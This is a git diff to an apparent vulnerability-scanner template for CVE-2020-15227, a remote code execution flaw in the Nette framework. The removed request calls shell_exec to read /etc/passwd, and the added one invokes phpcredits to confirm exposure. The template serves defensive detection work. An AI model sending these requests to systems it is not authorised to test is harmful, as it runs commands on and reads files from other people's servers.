diff --git a/http/cves/2020/CVE-2020-15227.yaml b/http/cves/2020/CVE-2020-15227.yaml
index b8787df977..e39296219f 100644
--- a/http/cves/2020/CVE-2020-15227.yaml
+++ b/http/cves/2020/CVE-2020-15227.yaml
@@ -27,20 +27,25 @@ info:
     max-request: 1
     vendor: nette
     product: application
+    fofa-query: app="nette-Framework"
+    verified: true
   tags: cve2020,cve,nette,rce
 
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"
+      - "{{BaseURL}}/nette.micro/?callback=phpcredits"
 
     matchers-condition: and
     matchers:
-      - type: regex
-        regex:
-          - "root:.*:0:0:"
+      - type: word
+        part: body
+        words:
+          - "PHP Credits"
 
-      - type: status
-        status:
-          - 200
-# digest: 4a0a00473045022100c514809246bae4d622a6f54b7f309f8d1838a8320122852f607689aa0d8591f00220583827d07fe105e21e3f2c8d355bd4a383c60d0b9fa26ec3897668a09ea6a421:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+      - type: word
+        part: header
+        words:
+          - "Nette Framework"
+
+# digest: 4a0a00473045022100c514809246bae4d622a6f54b7f309f8d1838a8320122852f607689aa0d8591f00220583827d07fe105e21e3f2c8d355bd4a383c60d0b9fa26ec3897668a09ea6a421:922c64590222798bb761d5b6d8e72950